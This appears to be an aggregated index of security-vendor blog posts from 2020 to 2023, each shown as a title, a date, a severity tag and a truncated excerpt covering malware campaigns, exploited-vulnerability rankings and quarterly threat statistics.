FORTIGUARD LABS THREAT RESEARCH
New Agent Tesla Variant Being Spread by Crafted Excel Document
By Xiaopeng Zhang | September 05, 2023
Affected platforms: Microsoft Windows
Impacted parties: Windows Users
Impact: Collects sensitive information from a victim’s computer
Severity level: Critical
Our FortiGuard Labs captured a phishing campaign that spreads a new Agent Tesla variant. This well-known malware family uses a .Net-based Remote Access Trojan (RAT) and data stealer to gain initial access. It is often used for Malware-as-a-Service (MaaS).
I performed an in-depth analysis of this campaign, from the initial phishing email to the actions of Agent Tesla installed on the victim’s machine to the collecting of sensitive information from the affected device. In this analysis, you will lear
Qualys
Top 20 Vulnerabilities Exploited by Cyber Attackers | Qualys
blogs_qualys·2023-09-04·CVSS 7.8
[HIGH] Top 20 Vulnerabilities Exploited by Cyber Attackers | Qualys
#### Table of Contents
- Stats on the Top 20 Vulnerable Vendors & By-Products
- Top Twenty Most Targeted by Attackers
- TruRisk Dashboard
- Key Insights & Takeaways
- References
- Additional Contributors
The earlier blog posts showcased an overview of the vulnerability threat landscape that is either remotely exploited or most targeted by attackers. A quick recap – We focused on high-risk vulnerabilities that can be remotely exploited with or without authentication, and with the view on the time to CISA being down to 8 days, the most vulnerabilities targeted by threat actors, malware & ransomware.
This blog post will focus on Qualys’ Top Twenty Vulnerabilities, targeted by threat actors, malware, and ransomware, with recent trending/sightings observed in the last few years and the curre
Qualys
Qualys Top 20 Most Exploited Vulnerabilities
blogs_qualys·2023-09-04·CVSS 7.8
[HIGH] Qualys Top 20 Most Exploited Vulnerabilities
## Table of Contents
Stats on the Top 20 Vulnerable Vendors & By-Products
Top Twenty Most Targeted by Attackers
TruRisk Dashboard
Key Insights & Takeaways
References
Additional Contributors
The earlier blog posts showcased an overview of the vulnerability threat landscape that is either remotely exploited or most targeted by attackers. A quick recap – We focused on high-risk vulnerabilities that can be remotely exploited with or without authentication, and with the view on the time to CISA being down to 8 days, the most vulnerabilities targeted by threat actors, malware & ransomware.
This blog post will focus on Qualys’ Top Twenty Vulnerabilities, targeted by threat actors, malware, and ransomware, with recent trending/sightings observed in the last few years and the current year.
Securelist
IT threat evolution in Q2 2023. Non-mobile statistics
blogs_securelist·2023-08-30
IT threat evolution in Q2 2023. Non-mobile statistics
Table of Contents
Quarterly figures
Financial threats
Financial threat statistics
Geography of financial malware attacks
Ransomware programs
Quarterly trends and highlights
MOVEit Transfer vulnerabilities exploited
Attacks on municipal organizations, educational and healthcare establishments
Most prolific groups
Number of new modifications
Number of users attacked by ransomware Trojans
Geography of attacked users
TOP 10 most common families of ransomware Trojans
Miners
Number of new miner modifications
Number of users attacked by miners
Geography of miner attacks
Vulnerable applications used by criminals during cyberattacks
Quarterly highlights
Vulnerability statistics
Attacks on macOS
Geography of threats for macOS
IoT attacks
IoT threat statistics
Attacks on IoT
Securelist
PC malware statistics, Q2 2022
blogs_securelist·2023-08-30
PC malware statistics, Q2 2022
Table of Contents
- Quarterly figures
- Financial threats
- Ransomware programs
- Most prolific groups
- Miners
- Vulnerable applications used by criminals during cyberattacks
- Attacks on macOS
- IoT attacks
- Attacks on IoT honeypots
- Attacks via web resources
- Local threats
Authors
- AMR
- IT threat evolution in Q2 2023
- IT threat evolution in Q2 2023. Non-mobile statistics
- IT threat evolution in Q2 2023. Mobile statistics
These statistics are based on detection verdicts of Kaspersky products and services received from users who consented to providing statistical data.
## Quarterly figures
According to Kaspersky Security Network, in Q2 2023:
- Kaspersky solutions blocked 801,934,281 attacks from online resources across the globe.
- A total of 209,716,810 unique links were d
Qualys
Part 2: An In-Depth Look at the Latest Vulnerability Threat Landscape (Attackers’ Edition)
blogs_qualys·2023-07-18
Part 2: An In-Depth Look at the Latest Vulnerability Threat Landscape (Attackers’ Edition)
## Table of Contents
Top Ten Vulnerabilities Exploited by Threat Actors
Top Ten Highly Active Threat Actors
Top Ten Most Exploited Vulnerabilities by Malware
Top Ten Most Active Malware
Top Ten Vulnerabilities Exploited by Ransomware
Prioritizing Exploited Vulnerabilities with TheQualys VMDR and TruRisk
Assess Your Organizations Exposure to Risk / TruRisk Dashboard
Key Insights & Takeaways
References
Additional Contributor
The previous blog from this three-part series showcased an overview of the vulnerability threat landscape. To summarize quickly, it illustrated the popular methods of exploiting vulnerabilities and the tactical techniques employed by threat actors, malware, and ransomware groups. Perhaps more crucially, we stated that commonly used solutions (CISA KEV/EPSS) of
Securelist
Non-mobile malware statistics, Q1 2023
blogs_securelist·2023-06-07
Non-mobile malware statistics, Q1 2023
Table of Contents
- Quarterly figures
- Financial threats
- Ransomware programs
- Most prolific groups
- Miners
- Vulnerable applications used in cyberattacks
- Attacks on macOS
- IoT attacks
- Attacks via web resources
- Local threats
Authors
- AMR
- IT threat evolution in Q1 2023
- IT threat evolution in Q1 2023. Non-mobile statistics
- IT threat evolution in Q1 2023. Mobile statistics
These statistics are based on detection verdicts of Kaspersky products and services received from users who consented to providing statistical data.
## Quarterly figures
According to Kaspersky Security Network, in Q1 2023:
- Kaspersky solutions blocked 865,071,227 attacks launched from online resources across the globe.
- Web Anti-Virus detected 246,912,694 unique URLs.
- Attempts to run malware fo
Securelist
IT threat evolution in Q1 2023. Non-mobile statistics
blogs_securelist·2023-06-07
IT threat evolution in Q1 2023. Non-mobile statistics
Table of Contents
Quarterly figures
Financial threats
Financial threat statistics
Geography of financial malware attacks
Ransomware programs
Quarterly trends and highlights
Attacks on Linux and VMWare ESXi servers
Progress in combating cybercrime
Conti-based Trojan decrypted
Most prolific groups
Number of new modifications
Number of users attacked by ransomware Trojans
Geography of attacked users
TOP 10 most common families of ransomware Trojans
Miners
Number of new miner modifications
Number of users attacked by miners
Geography of miner attacks
Vulnerable applications used in cyberattacks
Quarterly highlights
Vulnerability statistics
Attacks on macOS
Geography of threats for macOS
IoT attacks
IoT threat statistics
Attacks via web resources
Countries/territories
Securelist
Spam and phishing in 2022
blogs_securelist·2023-02-16
Spam and phishing in 2022
Table of Contents
Figures of the year
Phishing in 2022
Last year’s resonant global events
The pandemic
Crypto phishing and crypto scams
Compensation, bonus, and paid survey scams
Fake online stores and large vendor phishing
Hijacking of social media accounts
Spam in 2022
The pandemic
Contact form spam
Blackmail in the name of law enforcement agencies
Exploiting the news
Spam with malicious attachments
Two-stage spear phishing using a known phish kit
Statistics
How a phishing campaign unfolds
Victims
Statistics: spam
Share of spam in mail traffic
Countries and territories — sources of spam
Malicious mail attachments
Countries and territories targeted by malicious mailings
Statistics: phishing
Map of phishing attacks
Top-level domains
Organizations under phishing a
Securelist
Kaspersky's 2022 spam and phishing report
blogs_securelist·2023-02-16
Kaspersky's 2022 spam and phishing report
Table of Contents
- Figures of the year
- Phishing in 2022
- Spam in 2022
- Two-stage spear phishing using a known phish kit
- Statistics: spam
- Statistics: phishing
- Conclusion
Authors
- Tatyana Kulikova
- Roman Dedenok
- Olga Altukhova
- Andrey Kovtun
- Irina Shimko
## Figures of the year
In 2022:
- 48.63% of all emails around the world and 52.78% of all emails in the Russian segment of the internet were spam
- As much as 29.82% of all spam emails originated in Russia
- Kaspersky Mail Anti-Virus blocked 166,187,118 malicious email attachments
- Our Anti-Phishing system thwarted 507,851,735 attempts to follow phishing links
- 378,496 attempts to follow phishing links were associated with Telegram account hijacking
## Phishing in 2022
### Last year’s resonant global events
The
Checkpoint
Cloud Atlas targets entities in Russia and Belarus amid the ongoing war in Ukraine
blogs_checkpoint·2022-12-09
CVE-2017-11882 Cloud Atlas targets entities in Russia and Belarus amid the ongoing war in Ukraine
Latest Publications
CPR Podcast Channel
AI Research
Web 3.0 Security
Intelligence Reports
ThreatCloud AI
Threat Intelligence & Research
Zero Day Protection
Sandblast File Analysis
About Us
SUBSCRIBE
AI Research 2
Android Malware 23
Artificial Intelligence 4
ChatGPT 3
Check Point Research Publications 455
Cloud Security 1
CPRadio 44
Crypto 2
Data & Threat Intelligence 2
Data Analysis 0
Demos 22
Global Cyber Attack Reports 408
How To Guides 13
Ransomware 5
Russo-Ukrainian War 1
Security Report 1
Threat and data analysis 0
Threat Research 174
Web 3.0 Security 11
Wipers 0
## Cloud Atlas targets entities in Russia and Belarus amid the ongoing war in Ukraine
## Introduction
Cloud Atlas (or Inception ) is a cyber-espionage group. Since its discovery in 2014, th
Securelist
IT threat evolution in Q3 2022. Non-mobile statistics
blogs_securelist·2022-11-18
IT threat evolution in Q3 2022. Non-mobile statistics
Table of Contents
Quarterly figures
Financial threats
Number of users attacked by banking malware
TOP 10 banking malware families
Geography of financial malware attacks
Ransomware programs
Quarterly trends and highlights
Number of new modifications
Number of users attacked by ransomware Trojans
Geography of attacked users
TOP 10 most common families of ransomware Trojans
Miners
Number of new miner modifications
Number of users attacked by miners
Geography of miner attacks
Vulnerable applications used by criminals during cyberattacks
Quarterly highlights
Vulnerability statistics
Attacks on macOS
TOP 20 threats for macOS
Geography of threats for macOS
IoT attacks
IoT threat statistics
Attacks via web resources
Countries and territories that serve as sources of web-ba
Securelist
PC malware statistics, Q3 2022
blogs_securelist·2022-11-18
PC malware statistics, Q3 2022
Table of Contents
- Quarterly figures
- Financial threats
- Ransomware programs
- Miners
- Vulnerable applications used by criminals during cyberattacks
- Attacks on macOS
- IoT attacks
- Attacks via web resources
- Local threats
Authors
- AMR
- IT threat evolution in Q3 2022
- IT threat evolution in Q3 2022. Non-mobile statistics
- IT threat evolution in Q3 2022. Mobile statistics
These statistics are based on detection verdicts of Kaspersky products and services received from users who consented to providing statistical data.
## Quarterly figures
According to Kaspersky Security Network, in Q3 2022:
- Kaspersky solutions blocked 956,074,958 attacks from online resources across the globe.
- Web Anti-Virus recognized 251,288,987 unique URLs as malicious.
- Attempts to run malware fo
Fortinet
A Tale of PivNoxy and Chinoxy Puppeteer | FortiGuard Labs
blogs_fortinet·2022-08-22·CVSS 7.8
[HIGH] A Tale of PivNoxy and Chinoxy Puppeteer | FortiGuard Labs
FORTIGUARD LABS THREAT RESEARCH
A Tale of PivNoxy and Chinoxy Puppeteer
By Shunichi Imano and Fred Gutierrez | August 22, 2022
Recently, a simple and short email with a suspicious RTF attachment that had been sent to a telecommunications agency in South Asia caught the attention of FortiGuard Labs. The email was disguised as having come from a Pakistan government division and delivered the PivNoxy malware.
Affected Platforms: Windows
Impacted Parties: Windows users
Impact: Controls victim’s machine and collects sensitive information
Severity Level: Medium
This blog describes how the attack works, suggests who the threat actor behind the operation might be, and details the techniques used by the attacker.
Attack Overview
The attack started with a simple email that included a bare doc
Tenable
Cybersecurity Snapshot: 6 Things That Matter Right Now
blogs_tenable·2022-08-19
Cybersecurity Snapshot: 6 Things That Matter Right Now
## Cloud Exposure
Tenable Cloud Security (CNAPP) Request a demo
Tenable Cloud Vulnerability Management Request a demo
Tenable CIEM Request a demo
Secure your cloud
## Vulnerability Exposure
Tenable Vulnerability Management Try for free
Tenable Security Center Request a demo
Tenable Web App Scanning Try for free
Tenable Patch Management Request a demo
Tenable Enclave Security Request a demo
Tenable Attack Surface Management Request a demo
Tenable Nessus Try for free
## AI Exposure
Tenable AI Exposure Request a demo
## OT/IoT Exposure
Tenable OT Security Request a demo
## Identity Exposure
Tenable Identity Exposure Request a demo
## Business needs
Active Directory
AI Security Posture Management (AI-SPM)
AWS security
Azure security
Cloud Security Posture Man
Securelist
IT threat evolution in Q2 2022. Non-mobile statistics
blogs_securelist·2022-08-15
IT threat evolution in Q2 2022. Non-mobile statistics
Table of Contents
Quarterly figures
Financial threats
Financial threat statistics
Ransomware programs
Quarterly trends and highlights
Number of new modifications
Number of users attacked by ransomware Trojans
Geography of attacked users
TOP 10 most common families of ransomware Trojans
Miners
Number of new miner modifications
Number of users attacked by miners
Geography of miner attacks
Vulnerable applications used by criminals during cyberattacks
Quarterly highlights
Vulnerability statistics
Attacks on macOS
Geography of threats for macOS
IoT attacks
IoT threat statistics
Attacks via web resources
TOP 10 countries and territories that serve as sources of web-based attacks
Countries and territories where users faced the greatest risk of online infection
Local threat
Securelist
Non-mobile malware statistics, Q2 2022
blogs_securelist·2022-08-15
Non-mobile malware statistics, Q2 2022
Table of Contents
- Quarterly figures
- Financial threats
- Ransomware programs
- Miners
- Vulnerable applications used by criminals during cyberattacks
- Attacks on macOS
- IoT attacks
- Attacks via web resources
- Local threats
Authors
- AMR
- IT threat evolution in Q2 2022
- IT threat evolution in Q2 2022. Non-mobile statistics
- IT threat evolution in Q2 2022. Mobile statistics
These statistics are based on detection verdicts of Kaspersky products and services received from users who consented to providing statistical data.
## Quarterly figures
According to Kaspersky Security Network, in Q2 2022:
- Kaspersky solutions blocked 1,164,544,060 attacks from online resources across the globe.
- Web Anti-Virus recognized 273,033,368 unique URLs as malicious. Attempts to run malware fo
Tenable
Analyzing the Vulnerabilities Associated with the Top Malware Strains of 2021
blogs_tenable·2022-08-04
Analyzing the Vulnerabilities Associated with the Top Malware Strains of 2021
## Cloud Exposure
Tenable Cloud Security (CNAPP) Request a demo
Tenable Cloud Vulnerability Management Request a demo
Tenable CIEM Request a demo
Secure your cloud
## Vulnerability Exposure
Tenable Vulnerability Management Try for free
Tenable Security Center Request a demo
Tenable Web App Scanning Try for free
Tenable Patch Management Request a demo
Tenable Enclave Security Request a demo
Tenable Attack Surface Management Request a demo
Tenable Nessus Try for free
## AI Exposure
Tenable AI Exposure Request a demo
## OT/IoT Exposure
Tenable OT Security Request a demo
## Identity Exposure
Tenable Identity Exposure Request a demo
## Business needs
Active Directory
AI Security Posture Management (AI-SPM)
AWS security
Azure security
Cloud Security Posture Man
Securelist
IT threat evolution in Q1 2022. Non-mobile statistics
blogs_securelist·2022-05-27
IT threat evolution in Q1 2022. Non-mobile statistics
Table of Contents
Quarterly figures
Financial threats
Financial threat statistics
Geography of financial malware attacks
TOP 10 banking malware families
Ransomware programs
Quarterly trends and highlights
Law enforcement successes
HermeticWiper, HermeticRansom and RUransom, etc.
Conti source-code leak
Attacks on NAS devices
Maze Decryptor
Number of new modifications
Number of users attacked by ransomware Trojans
Geography of attacked users
TOP 10 most common families of ransomware Trojans
Miners
Number of new miner modifications
Number of users attacked by miners
Geography of miner attacks
Vulnerable applications used by criminals during cyberattacks
Quarter highlights
Vulnerability statistics
Attacks on macOS
Geography of threats for macOS
IoT attacks
IoT threat
Securelist
PC malware statistics, Q1 2022
blogs_securelist·2022-05-27
PC malware statistics, Q1 2022
Table of Contents
- Quarterly figures
- Financial threats
- Ransomware programs
- Miners
- Vulnerable applications used by criminals during cyberattacks
- Attacks on macOS
- IoT attacks
- Attacks via web resources
- Local threats
Authors
- AMR
- IT threat evolution in Q1 2022
- IT threat evolution in Q1 2022. Non-mobile statistics
- IT threat evolution in Q1 2022. Mobile statistics
These statistics are based on detection verdicts of Kaspersky products and services received from users who consented to providing statistical data.
## Quarterly figures
According to Kaspersky Security Network, in Q1 2022:
- Kaspersky solutions blocked 1,216,350,437 attacks from online resources across the globe.
- Web Anti-Virus recognized 313,164,030 unique URLs as malicious.
- Attempts to run malware
Talos
Bitter APT adds Bangladesh to their targets
blogs_talos·2022-05-11·CVSS 7.8
[HIGH] Bitter APT adds Bangladesh to their targets
- Cisco Talos has observed an ongoing malicious campaign since August 2021 from the Bitter APT group that appears to target users in Bangladesh, a change from the attackers' usual victims.
- As part of this, there's a new trojan based on Apost Talos is calling "ZxxZ," that, among other features, includes remote file execution capability.
- Based on the similarities between the C2 server in this campaign with that of Bitter's previous campaign, we assess with moderate confidence that this campaign is operated by the Bitter APT group.
### Executive Summary
Cisco Talos discovered an ongoing campaign operated by what we believe is the Bitter APT group since August 2021. This campaign is a typical example of the actor targeting South Asian government entities.
This campaign targets an elite
Talos
Bitter APT adds Bangladesh to their targets
blogs_talos·2022-05-11·CVSS 7.8
[HIGH] Bitter APT adds Bangladesh to their targets
## Bitter APT adds Bangladesh to their targets
Cisco Talos has observed an ongoing malicious campaign since August 2021 from the Bitter APT group that appears to target users in Bangladesh, a change from the attackers' usual victims.
As part of this, there's a new trojan based on Apost Talos is calling "ZxxZ," that, among other features, includes remote file execution capability.
Based on the similarities between the C2 server in this campaign with that of Bitter's previous campaign, we assess with moderate confidence that this campaign is operated by the Bitter APT group.
## Executive Summary
Cisco Talos discovered an ongoing campaign operated by what we believe is the Bitter APT group since August 2021. This campaign is a typical example of the actor targeting South Asian government
Qualys
Managing CISA Known Exploited Vulnerabilities with Qualys VMDR | Qualys
blogs_qualys·2022-02-23
Managing CISA Known Exploited Vulnerabilities with Qualys VMDR | Qualys
#### Table of Contents
- Situation
- Directive Scope
- CISA Catalog of Known Exploited Vulnerabilities
- Detect CISA Vulnerabilities Using Qualys VMDR
- CISA Exploited RTI
- Detailed Operational Dashboard
- Remediation
- Federal Enterprises and Agencies Can Act Now
- Summary
- Getting Started
CISA released a directive in November 2021, recommending urgent and prioritized remediation of actively exploited vulnerabilities. Both government agencies and corporations should heed this advice. This blog outlines how Qualys Vulnerability Management, Detection & Response can be used by any organization to respond to this directive efficiently and effectively.
## Situation
Last November 2021, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) released a Binding Operational Directiv
Securelist
Kaspersky spam and phishing report for 2021
blogs_securelist·2022-02-09
Kaspersky spam and phishing report for 2021
Table of Contents
- Figures of the year
- Trends of the year
- Statistics: spam
- Statistics: phishing
- Conclusion
Authors
- Tatyana Kulikova
- Tatyana Shcherbakova
## Figures of the year
In 2021:
- 45.56% of e-mails were spam
- 24.77% of spam was sent from Russia with another 14.12% from Germany
- Our Mail Anti-Virus blocked 148 173 261 malicious attachments sent in e-mails
- The most common malware family found in attachments were Agensla Trojans
- Our Anti-Phishing system blocked 253 365 212 phishing links
- Safe Messaging blocked 341 954 attempts to follow phishing links in messengers
## Trends of the year
### How to make an unprofitable investment with no return
The subject of investments gained significant relevance in 2021, with banks and other organizations actively prom
Securelist
IT threat evolution in Q3 2021. PC statistics
blogs_securelist·2021-11-26
IT threat evolution in Q3 2021. PC statistics
Table of Contents
Quarterly figures
Financial threats
Financial threat statistics
Ransomware programs
Quarterly trends and highlights
Attack on Kaseya and the REvil story
The arrival of BlackMatter: DarkSide restored?
Q3 closures
Exploitation of vulnerabilities and new attack methods
Number of new ransomware modifications
Number of users attacked by ransomware Trojans
Geography of ransomware attacks
Top 10 most common families of ransomware Trojans
Miners
Number of new miner modifications
Number of users attacked by miners
Geography of miner attacks
Vulnerable applications used by cybercriminals during cyberattacks
Quarter highlights
Statistics
Attacks on macOS
Geography of threats for macOS
IoT attacks
IoT threat statistics
Attacks via web resources
Countries tha
Securelist
IT threat evolution in Q3 2021. PC statistics
blogs_securelist·2021-11-26
IT threat evolution in Q3 2021. PC statistics
Table of Contents
- Quarterly figures
- Financial threats
- Ransomware programs
- Number of users attacked by ransomware Trojans
- Geography of ransomware attacks
- Top 10 most common families of ransomware Trojans
- Miners
- Vulnerable applications used by cybercriminals during cyberattacks
- Attacks on macOS
- IoT attacks
- Attacks via web resources
- Local threats
Authors
- AMR
- IT threat evolution Q3 2021
- IT threat evolution in Q3 2021. PC statistics
- IT threat evolution in Q3 2021. Mobile statistics
These statistics are based on detection verdicts of Kaspersky products received from users who consented to providing statistical data.
## Quarterly figures
According to Kaspersky Security Network, in Q3 2021:
- Kaspersky solutions blocked 1,098,968,315 attacks from online reso
Securelist
Q3 2021 spam and phishing report
blogs_securelist·2021-11-01
Q3 2021 spam and phishing report
Table of Contents
- Quarterly highlights
- Statistics: spam
- Statistics: phishing
- Takeaways
Authors
- Tatyana Kulikova
- Tatyana Shcherbakova
## Quarterly highlights
### Scamming championship: sports-related fraud
This summer and early fall saw some major international sporting events. The delayed Euro 2020 soccer tournament was held in June and July, followed by the equally delayed Tokyo Olympics in August. Q3 2021 also featured several F1 Grand Prix races. There was no way that cybercriminals and profiteers could pass up such a golden opportunity. Fans wanting to attend events live encountered fake ticket-selling websites. Some sites made a point of stressing the tickets were “official”, despite charging potential victims several times the real price of a ticket, and some just
Securelist
IT threat evolution Q2 2021
blogs_securelist·2021-08-12·CVSS 7.8
[HIGH] IT threat evolution Q2 2021
Table of Contents
- Targeted attacks
- Other malware
Authors
- David Emm
## Targeted attacks
### The leap of a Cycldek-related threat actor
It is quite common for Chinese-speaking threat actors to share tools and methodologies: one such example is the infamous “DLL side-loading triad”: a legitimate executable, a malicious DLL to be side-loaded by it and an encoded payload, generally dropped from a self-extracting archive. This was first thought to be a signature of LuckyMouse, but we have observed other groups using similar “triads”, including HoneyMyte. While it is not possible to attribute attacks based on this technique alone, efficient detection of such triads reveals more and more malicious activity.
We recently described one such file, called “FoundCore”, which caught our atte
Securelist
IT threat evolution in Q2 2021. PC statistics
blogs_securelist·2021-08-12
IT threat evolution in Q2 2021. PC statistics
Table of Contents
- Quarterly figures
- Financial threats
- Ransomware programs
- Miners
- Vulnerable applications used by cybercriminals during cyberattacks
- Attacks on macOS
- IoT attacks
- Attacks via web resources
- Local threats
Authors
- AMR
These statistics are based on detection verdicts of Kaspersky products received from users who consented to providing statistical data.
## Quarterly figures
According to Kaspersky Security Network, in Q2 2021:
- Kaspersky solutions blocked 1,686,025,551 attacks from online resources across the globe.
- Web antivirus recognized 675,832,360 unique URLs as malicious.
- Attempts to run malware for stealing money from online bank accounts were stopped on the computers of 119,252 unique users.
- Ransomware attacks were defeated on the computers
Securelist
IT threat evolution Q1 2021. Non-mobile statistics
blogs_securelist·2021-05-31
IT threat evolution Q1 2021. Non-mobile statistics
Table of Contents
Quarterly figures
Financial threats
Financial threat statistics
Ransomware programs
Quarterly trends and highlights
Number of new modifications
Number of users attacked by ransomware Trojans
Attack geography
Top 10 most common families of ransomware Trojans
Miners
Number of new modifications
Number of users attacked by miners
Attack geography
Vulnerable applications used by cybercriminals during cyber attacks
Attacks on macOS
Threat geography
IoT attacks
IoT threat statistics
SSH-based attacks
Threats loaded into traps
Attacks via web resources
Countries that are sources of web-based attacks: Top 10
Countries where users faced the greatest risk of online infection
Local threats
Countries where users faced the highest risk of local infection
Autho
Securelist
IT threat evolution Q1 2021. Non-mobile statistics
blogs_securelist·2021-05-31
IT threat evolution Q1 2021. Non-mobile statistics
Table of Contents
- Quarterly figures
- Financial threats
- Ransomware programs
- Miners
- Vulnerable applications used by cybercriminals during cyber attacks
- Attacks on macOS
- IoT attacks
- Attacks via web resources
- Local threats
Authors
- AMR
These statistics are based on detection verdicts of Kaspersky products received from users who consented to provide statistical data.
## Quarterly figures
According to Kaspersky Security Network, in Q1 2021:
- Kaspersky solutions blocked 2,023,556,082 attacks launched from online resources across the globe.
- 613,968,631 unique URLs were recognized as malicious by Web Anti-Virus components.
- Attempts to run malware designed to steal money via online access to bank accounts were stopped on the computers of 118,099 users.
- Ransomware att
Securelist
The leap of a Cycldek-related threat actor
blogs_securelist·2021-04-05
The leap of a Cycldek-related threat actor
Table of Contents
- Introduction
- FoundCore Loader
- FoundCore payload
- RoyalRoad documents, DropPhone and CoreLoader
- Victimology and attribution
- Conclusion
- Indicators of Compromise
Authors
- Ivan Kwiatkowski
- Pierre Delcher
- Mark Lechtik
## Introduction
In the nebula of Chinese-speaking threat actors, it is quite common to see tools and methodologies being shared. One such example of this is the infamous “DLL side-loading triad”: a legitimate executable, a malicious DLL to be sideloaded by it, and an encoded payload, generally dropped from a self-extracting archive. Initially considered to be the signature of LuckyMouse, we observed other groups starting to use similar “triads” such as HoneyMyte. While it implies that it is not possible to attribute attacks based on this t
Securelist
IT threat evolution Q3 2020. Non-mobile statistics
blogs_securelist·2020-11-20
IT threat evolution Q3 2020. Non-mobile statistics
Table of Contents
Quarterly figures
Financial threats
Financial threat statistics
Attack geography
Ransomware programs
Quarterly trends and highlights
Number of new modifications
Number of users attacked by ransomware Trojans
Attack geography
Miners
Number of new modifications
Number of users attacked by miners
Attack geography
Vulnerable applications used by cybercriminals during cyberattacks
Attacks on macOS
Threat geography
IoT attacks
IoT threat statistics
Attacks via web resources
Countries that are sources of web-based attacks: Top 10
Countries where users faced the greatest risk of online infection
Local threats
Countries where users faced the highest risk of local infection
Authors
Victor Chebyshev
Fedor Sinitsyn
Denis Parinov
Oleg Kupreev
Evgeny Lopati
Securelist
IT threat evolution Q3 2020. Non-mobile statistics
blogs_securelist·2020-11-20
IT threat evolution Q3 2020. Non-mobile statistics
Table of Contents
- Quarterly figures
- Financial threats
- Ransomware programs
- Miners
- Vulnerable applications used by cybercriminals during cyberattacks
- Attacks on macOS
- IoT attacks
- Attacks via web resources
- Local threats
Authors
- Victor Chebyshev
- Fedor Sinitsyn
- Denis Parinov
- Oleg Kupreev
- Evgeny Lopatin
- Alexey Kulaev
- Alexander Kolesnikov
These statistics are based on detection verdicts of Kaspersky products received from users who consented to provide statistical data.
## Quarterly figures
According to Kaspersky Security Network, in Q3:
- Kaspersky solutions blocked 1,416,295,227 attacks launched from online resources across the globe.
- 456,573,467 unique URLs were recognized as malicious by Web Anti-Virus components.
- Attempts to run malware for stealing
Securelist
MosaicRegressor: Lurking in the Shadows of UEFI
blogs_securelist·2020-10-05
MosaicRegressor: Lurking in the Shadows of UEFI
Table of Contents
Current State of the Art
Our Discovery
The Bigger Picture: Enter MosaicRegressor Framework
Who were the Targets?
Who is behind the attack?
Conclusion
IoCs
Authors
Mark Lechtik
Igor Kuznetsov
Yury Parshin
Part II. Technical details (PDF)
UEFI (or Unified Extensible Firmware Interface) has become a prominent technology that is embedded within designated chips on modern day computer systems. Replacing the legacy BIOS, it is typically used to facilitate the machine’s boot sequence and load the operating system, while using a feature-rich environment to do so. At the same time, it has become the target of threat actors to carry out exceptionally persistent attacks.
One such attack has become the subject of our research, where we found a compromised UEFI firmware
Securelist
MosaicRegressor: Lurking in the Shadows of UEFI
blogs_securelist·2020-10-05
MosaicRegressor: Lurking in the Shadows of UEFI
Table of Contents
- Current State of the Art
- Our Discovery
- The Bigger Picture: Enter MosaicRegressor Framework
- Who were the Targets?
- Who is behind the attack?
- Conclusion
- IoCs
Authors
- Mark Lechtik
- Igor Kuznetsov
- Yury Parshin
Part II. Technical details (PDF)
UEFI (or Unified Extensible Firmware Interface) has become a prominent technology that is embedded within designated chips on modern day computer systems. Replacing the legacy BIOS, it is typically used to facilitate the machine’s boot sequence and load the operating system, while using a feature-rich environment to do so. At the same time, it has become the target of threat actors to carry out exceptionally persistent attacks.
One such attack has become the subject of our research, where we found a compromised U
Securelist
IT threat evolution Q2 2020. PC statistics
blogs_securelist·2020-09-03
IT threat evolution Q2 2020. PC statistics
Table of Contents
- Quarterly figures
- Financial threats
- Ransomware programs
- Miners
- Vulnerable applications used by cybercriminals during cyberattacks
- Attacks on Apple macOS
- IoT attacks
- Attacks via web resources
- Local threats
Authors
- Victor Chebyshev
- Evgeny Lopatin
- Fedor Sinitsyn
- Denis Parinov
- Oleg Kupreev
- Alexey Kulaev
- Alexander Kolesnikov
IT threat evolution Q2 2020. Review
IT threat evolution Q2 2020. Mobile statistics
These statistics are based on detection verdicts of Kaspersky products received from users who consented to provide statistical data.
## Quarterly figures
According to Kaspersky Security Network, in Q2:
- Kaspersky solutions blocked 899,744,810 attacks launched from online resources in 191 countries across the globe.
- As many as 286,
Securelist
IT threat evolution Q2 2020. PC statistics
blogs_securelist·2020-09-03
IT threat evolution Q2 2020. PC statistics
Table of Contents
Quarterly figures
Financial threats
Financial threat statistics
Ransomware programs
Quarterly trend highlights
Number of new modifications
Number of users attacked by ransomware Trojans
Geography of attacks
Top 10 most common families of ransomware Trojans
Miners
Number of new modifications
Number of users attacked by miners
Geography of attacks
Vulnerable applications used by cybercriminals during cyberattacks
Attacks on Apple macOS
Threat geography
IoT attacks
IoT threat statistics
Threats loaded into traps
Attacks via web resources
Countries that are sources of web-based attacks: TOP 10
Countries where users faced the greatest risk of online infection
Local threats
Countries where users faced the highest risk of local infection
Authors
Victor
Securelist
Cycldek: Bridging the (air) gap
blogs_securelist·2020-06-03
Cycldek: Bridging the (air) gap
Table of Contents
Key findings
Background
Two implants, two clusters
Info stealing and lateral movement toolset
Formerly Unreported Malware: USBCulprit
Conclusion
Appendix – IOCs
Authors
GReAT
Mark Lechtik
Giampaolo Dedola
## Key findings
While investigating attacks related to a group named Cycldek post 2018, we were able to uncover various pieces of information on its activities that were not known thus far. In this blog post we aim to bridge the knowledge gap on this group and provide a more thorough insight into its latest activities and modus operandi. Here are some key insights that will be described in this publication:
Cycldek (also known as Goblin Panda and Conimes) has been active in the past two years, conducting targeted operations against governments in Southeast
Securelist
Cycldek: Bridging the (air) gap
blogs_securelist·2020-06-03
Cycldek: Bridging the (air) gap
Table of Contents
- Key findings
- Background
- Two implants, two clusters
- Info stealing and lateral movement toolset
- Formerly Unreported Malware: USBCulprit
- Conclusion
- Appendix – IOCs
Authors
- GReAT
- Mark Lechtik
- Giampaolo Dedola
## Key findings
While investigating attacks related to a group named Cycldek post 2018, we were able to uncover various pieces of information on its activities that were not known thus far. In this blog post we aim to bridge the knowledge gap on this group and provide a more thorough insight into its latest activities and modus operandi. Here are some key insights that will be described in this publication:
- Cycldek (also known as Goblin Panda and Conimes) has been active in the past two years, conducting targeted operations against governmen
Tenable
How VPR Helped Prioritize the Most Dangerous CVEs in 2019
blogs_tenable·2020-04-30
How VPR Helped Prioritize the Most Dangerous CVEs in 2019
## Cloud Exposure
Tenable Cloud Security (CNAPP) Request a demo
Tenable Cloud Vulnerability Management Request a demo
Tenable CIEM Request a demo
Secure your cloud
## Vulnerability Exposure
Tenable Vulnerability Management Try for free
Tenable Security Center Request a demo
Tenable Web App Scanning Try for free
Tenable Patch Management Request a demo
Tenable Enclave Security Request a demo
Tenable Attack Surface Management Request a demo
Tenable Nessus Try for free
## AI Exposure
Tenable AI Exposure Request a demo
## OT/IoT Exposure
Tenable OT Security Request a demo
## Identity Exposure
Tenable Identity Exposure Request a demo
## Business needs
Active Directory
AI Security Posture Management (AI-SPM)
AWS security
Azure security
Cloud Security Posture Man
Qualys
